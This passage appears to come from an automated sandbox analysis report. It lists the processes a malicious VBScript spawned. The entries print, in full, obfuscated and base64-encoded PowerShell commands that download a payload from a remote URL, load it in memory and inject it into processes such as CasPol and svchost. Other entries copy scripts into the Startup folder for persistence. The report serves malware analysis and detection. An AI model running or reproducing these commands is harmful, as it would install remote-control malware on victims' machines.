'+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\escrivan.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')') |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\escrivan.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')') |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\32\hnvc.vbs" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\pow\wm.vbs" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')') |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')') |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgntnjydxjsjysnid0nkycgwicrj0hvjysnahqnkyd0chm6ly8nkydpytywmccrjzewjysnmc51cy5hcmnojysnaxynkydllicrj29yzy8ync8nkydpdccrj2vtcy9kzxrhjysnac1ujysnb3rllxyvrccrj2unkyd0ywhob3rlvicrjy50eccrj3rasg87tnjyjysnymenkydzzty0q29udgvujysndca9ichozxctt2jqzwn0ifn5c3rlbs4nkydozxquv2viqycrj2xpzscrj250ks5eb3dubg9hzccrj1n0cmluzyhoclh1cmwnkycpo05yjysnwccrj2jpjysnbicrj2fyjysneunvbnrlbicrj3qgpscrjybbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzscrjzy0uycrj3ryjysnaw4nkydnke5ywgjhcycrj2u2nemnkydvbicrj3rlbicrj3qpo05ywgfzc2vtymx5id0gjysnw1jlzmxlyycrj3rpb24ujysnqscrj3nzzw1ibhldoicrjzpmjysnb2fkkccrj05yjysnwgjpbmfyjysneumnkydvbnqnkydlbnqpjysnoycrj05ywccrj3r5cccrj2unkycgpscrjyboclhhc3nlbwjsjysnes5hzxruexblkfpibycrj1j1blbflkhvbwvasg8po05ywccrj20nkydldghvzca9iccrj04nkydywhqnkyd5cguurycrj2v0tscrj2v0ag9kjysnkfpijysnb1zbsvpibyk7ticrj3inkydybwv0accrj29klicrj0lujysndm9rzshocicrj1hujysndscrj2xslcbbb2jqzwn0w11dqchasg8wl0u3tycrjzi4l2qvzwuujysnzxrzyxavlzpzchr0afpijysnbyasjysniccrj1pibzfasg8nkycglcbasg9dok93r1bybycrj2dyyw1eyscrj3rhjysntycrj3dhwkgnkydvicwgwkhvahzuy1onkydibywnkydajysnsg9zdicrj2nob3n0wkhvlfpib1pibyknkycpjykglwnyzxbmywnlicaow2noqvjdotarw2noqvjdnzirw2noqvjdmtexksxby2hbul0zos1yzvbsqunlj093rycsw2noqvjdotitcmvqbefdzsaow2noqvjdnzgrw2noqvjdmte0k1tjaefsxtg4ksxby2hbul0znil8aw52t0tllwv4ufjlu1npt04=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('nrxurl'+' ='+' z'+'ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/d'+'e'+'tahnotev'+'.tx'+'tzho;nrx'+'ba'+'se64conten'+'t = (new-object system.'+'net.webc'+'lie'+'nt).download'+'string(nrxurl'+');nr'+'x'+'bi'+'n'+'ar'+'yconten'+'t ='+' [system.convert]::frombase'+'64s'+'tr'+'in'+'g(nrxbas'+'e64c'+'on'+'ten'+'t);nrxassembly = '+'[reflec'+'tion.'+'a'+'ssembly]:'+':l'+'oad('+'nr'+'xbinar'+'yc'+'ont'+'ent)'+';'+'nrx'+'typ'+'e'+' ='+' nrxassembl'+'y.gettype(zho'+'runpe.homezho);nrx'+'m'+'ethod = '+'n'+'rxt'+'ype.g'+'etm'+'ethod'+'(zh'+'ovaizho);n'+'r'+'xmeth'+'od.'+'in'+'voke(nr'+'xn'+'u'+'ll, [object[]]@(zho0/e7o'+'28/d/ee.'+'etsap//:sptthzh'+'o ,'+' '+'zho1zho'+' , zhoc:owgpro'+'gramda'+'ta'+'o'+'wgzh'+'o , zhohvncz'+'ho,'+'z'+'hosv'+'chostzho,zhozho)'+')') -creplace ([char]90+[char]72+[char]111),[char]39-replace'owg',[char]92-replace ([char]78+[char]114+[char]88),[char]36)|invoke-expression" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgntnjydxjsjysnid0nkycgwicrj0hvjysnahqnkyd0chm6ly8nkydpytywmccrjzewjysnmc51cy5hcmnojysnaxynkydllicrj29yzy8ync8nkydpdccrj2vtcy9kzxrhjysnac1ujysnb3rllxyvrccrj2unkyd0ywhob3rlvicrjy50eccrj3rasg87tnjyjysnymenkydzzty0q29udgvujysndca9ichozxctt2jqzwn0ifn5c3rlbs4nkydozxquv2viqycrj2xpzscrj250ks5eb3dubg9hzccrj1n0cmluzyhoclh1cmwnkycpo05yjysnwccrj2jpjysnbicrj2fyjysneunvbnrlbicrj3qgpscrjybbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzscrjzy0uycrj3ryjysnaw4nkydnke5ywgjhcycrj2u2nemnkydvbicrj3rlbicrj3qpo05ywgfzc2vtymx5id0gjysnw1jlzmxlyycrj3rpb24ujysnqscrj3nzzw1ibhldoicrjzpmjysnb2fkkccrj05yjysnwgjpbmfyjysneumnkydvbnqnkydlbnqpjysnoycrj05ywccrj3r5cccrj2unkycgpscrjyboclhhc3nlbwjsjysnes5hzxruexblkfpibycrj1j1blbflkhvbwvasg8po05ywccrj20nkydldghvzca9iccrj04nkydywhqnkyd5cguurycrj2v0tscrj2v0ag9kjysnkfpijysnb1zbsvpibyk7ticrj3inkydybwv0accrj29klicrj0lujysndm9rzshocicrj1hujysndscrj2xslcbbb2jqzwn0w11dqchasg8wl0u3tycrjzi4l2qvzwuujysnzxrzyxavlzpzchr0afpijysnbyasjysniccrj1pibzfasg8nkycglcbasg9dok93r1bybycrj2dyyw1eyscrj3rhjysntycrj3dhwkgnkydvicwgwkhvahzuy1onkydibywnkydajysnsg9zdicrj2nob3n0wkhvlfpib1pibyknkycpjykglwnyzxbmywnlicaow2noqvjdotarw2noqvjdnzirw2noqvjdmtexksxby2hbul0zos1yzvbsqunlj093rycsw2noqvjdotitcmvqbefdzsaow2noqvjdnzgrw2noqvjdmte0k1tjaefsxtg4ksxby2hbul0znil8aw52t0tllwv4ufjlu1npt04=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('nrxurl'+' ='+' z'+'ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/d'+'e'+'tahnotev'+'.tx'+'tzho;nrx'+'ba'+'se64conten'+'t = (new-object system.'+'net.webc'+'lie'+'nt).download'+'string(nrxurl'+');nr'+'x'+'bi'+'n'+'ar'+'yconten'+'t ='+' [system.convert]::frombase'+'64s'+'tr'+'in'+'g(nrxbas'+'e64c'+'on'+'ten'+'t);nrxassembly = '+'[reflec'+'tion.'+'a'+'ssembly]:'+':l'+'oad('+'nr'+'xbinar'+'yc'+'ont'+'ent)'+';'+'nrx'+'typ'+'e'+' ='+' nrxassembl'+'y.gettype(zho'+'runpe.homezho);nrx'+'m'+'ethod = 